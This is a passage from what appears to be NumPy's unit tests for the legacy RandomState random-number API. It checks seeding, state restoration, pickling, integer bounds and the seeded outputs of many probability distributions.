assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random.seed(1432985819)
non_contig = random.multinomial(100, pvals=pvals)
random.seed(1432985819)
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
class TestSetState:
def setup(self):
self.seed = 1234567890
self.random_state = random.RandomState(self.seed)
self.state = self.random_state.get_state()
def test_basic(self):
old = self.random_state.tomaxint(16)
self.random_state.set_state(self.state)
new = self.random_state.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(self.state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.random_state.standard_normal()
state = self.random_state.get_state()
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.random_state.standard_normal(size=16)
self.random_state.set_state(old_state)
x2 = self.random_state.standard_normal(size=16)
self.random_state.set_state(self.state)
x3 = self.random_state.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.random_state.negative_binomial(0.5, 0.5)
def test_get_state_warning(self):
rs = random.RandomState(PCG64())
with suppress_warnings() as sup:
w = sup.record(RuntimeWarning)
state = rs.get_state()
assert_(len(w) == 1)
assert isinstance(state, dict)
assert state['bit_generator'] == 'PCG64'
def test_invalid_legacy_state_setting(self):
state = self.random_state.get_state()
new_state = ('Unknown', ) + state[1:]
assert_raises(ValueError, self.random_state.set_state, new_state)
assert_raises(TypeError, self.random_state.set_state,
np.array(new_state, dtype=object))
state = self.random_state.get_state(legacy=False)
del state['bit_generator']
assert_raises(ValueError, self.random_state.set_state, state)
def test_pickle(self):
self.random_state.seed(0)
self.random_state.random_sample(100)
self.random_state.standard_normal()
pickled = self.random_state.get_state(legacy=False)
assert_equal(pickled['has_gauss'], 1)
rs_unpick = pickle.loads(pickle.dumps(self.random_state))
unpickled = rs_unpick.get_state(legacy=False)
assert_mt19937_state_equal(pickled, unpickled)
def test_state_setting(self):
attr_state = self.random_state.__getstate__()
self.random_state.standard_normal()
self.random_state.__setstate__(attr_state)
state = self.random_state.get_state(legacy=False)
assert_mt19937_state_equal(attr_state, state)
def test_repr(self):
assert repr(self.random_state).startswith('RandomState(MT19937)')
class TestRandint:
rfunc = random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
# We use a sha256 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '509aea74d792fb931784c4b0135392c65aec64beee12b0cc167548a2c3d31e71',
'int16': '7b07f1a920e46f6d0fe02314155a2330bcfd7635e708da50e536c5ebb631a7d4',
'int32': 'e577bfed6c935de944424667e3da285012e741892dcb7051a8f1ce68ab05c92f',
'int64': '0fbead0b06759df2cfb55e43148822d4a1ff953c7eb19a5b08445a63bb64fa9e',
'int8': '001aac3a5acb935a9b186cbe14a1ca064b8bb2dd0b045d48abeacf74d0203404',
'uint16': '7b07f1a920e46f6d0fe02314155a2330bcfd7635e708da50e536c5ebb631a7d4',
'uint32': 'e577bfed6c935de944424667e3da285012e741892dcb7051a8f1ce68ab05c92f',
'uint64': '0fbead0b06759df2cfb55e43148822d4a1ff953c7eb19a5b08445a63bb64fa9e',
'uint8': '001aac3a5acb935a9b186cbe14a1ca064b8bb2dd0b045d48abeacf74d0203404'}
for dt in self.itype[1:]:
random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.sha256(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.sha256(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
@pytest.mark.skipif(np.iinfo('l').max < 2**32,
reason='Cannot test with 32-bit C long')
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[3992670689, 2438360420, 2557845020],
[4107320065, 4142558326, 3216529513],
[1605979228, 2807061240, 665605495]],
[[3211410639, 4128781000, 457175120],
[1712592594, 1282922662, 3081439808],
[3997822960, 2008322436, 1563495165]],
[[1398375547, 4269260146, 115316740],
[3414372578, 3437564012, 2112038651],
[3572980305, 2260248732, 3908238631]],
[[2561372503, 223155946, 3127879445],
[ 441282060, 3514786552, 2148440361],
[1629275283, 3479737011, 3003195987]],
[[ 412181688, 940383289, 3047321305],
[2978368172, 764731833, 2282559898],
[ 105711276, 720447391, 3596512484]]])
for size in [None, (5, 3, 3)]:
random.seed(12345)
x = self.rfunc([[-1], [0], [1]], [2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_corner_case(self):
        # When stored in Numpy arrays, `lbnd` is cast
        # as np.int64, and `ubnd` is cast as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
        # causing it to be rounded down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
random.seed(self.seed)
actual = random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rand_singleton(self):
random.seed(self.seed)
actual = random.rand()
desired = 0.61879477158567997
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
random.seed(self.seed)
actual = random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.randn()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_randint(self):
random.seed(self.seed)
actual = random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(198, size=(3, 2))
assert_(len(w) == 1)
assert_array_equal(actual, desired + 100)
def test_tomaxint(self):
random.seed(self.seed)
rs = random.RandomState(self.seed)
actual = rs.tomaxint(size=(3, 2))
if np.iinfo(int).max == 2147483647:
desired = np.array([[1328851649, 731237375],
[1270502067, 320041495],
[1908433478, 499156889]], dtype=np.int64)
else:
desired = np.array([[5707374374421908479, 5456764827585442327],
[8196659375100692377, 8224063923314595285],
[4220315081820346526, 7177518203184491332]],
dtype=np.int64)
assert_equal(actual, desired)
rs.seed(self.seed)
actual = rs.tomaxint()
assert_equal(actual, desired[0, 0])
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
typer = np.dtype('l').type
actual = random.random_integers(typer(np.iinfo('l').max),
typer(np.iinfo('l').max))
assert_(len(w) == 1)
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
random.seed(self.seed)
actual = random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.random_sample()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_choice_uniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random.seed(self.seed)
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.randint(0, -10, size=0).shape, (0,))
assert_equal(random.randint(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random.seed(self.seed)
non_contig = random.choice(5, 3, p=p[::2])
random.seed(self.seed)
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_bytes(self):
random.seed(self.seed)
actual = random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_permutation(self):
random.seed(self.seed)
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [0, 1, 9, 6, 2, 4, 5, 8, 7, 3]
assert_array_equal(actual, desired)
random.seed(self.seed)
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
random.seed(self.seed)
bad_x_str = "abcd"
assert_raises(IndexError, random.permutation, bad_x_str)
random.seed(self.seed)
bad_x_float = 1.2
assert_raises(IndexError, random.permutation, bad_x_float)
integer_val = 10
desired = [9, 0, 8, 5, 1, 3, 4, 7, 6, 2]
random.seed(self.seed)
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_beta(self):
random.seed(self.seed)
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random.seed(self.seed)
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
random.seed(self.seed)
actual = random.binomial(100.123, .456)
desired = 37
assert_array_equal(actual, desired)
def test_chisquare(self):
random.seed(self.seed)
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random.seed(self.seed)
non_contig = random.dirichlet(alpha, size=(3, 2))
random.seed(self.seed)
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_exponential(self):
random.seed(self.seed)
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random.seed(self.seed)
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random.seed(self.seed)
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random.seed(self.seed)
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random.seed(self.seed)
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random.seed(self.seed)
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random.seed(self.seed)
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random.seed(self.seed)
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random.seed(self.seed)
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random.seed(self.seed)
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random.seed(self.seed)
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
        # Check the default size; this used to raise a deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
        # Check that a non-positive-semidefinite covariance matrix warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
        # and that it doesn't warn when check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
        # and that it raises a ValueError when check_valid='raise'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
def test_negative_binomial(self):
random.seed(self.seed)
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_noncentral_chisquare(self):
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random.seed(self.seed)
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
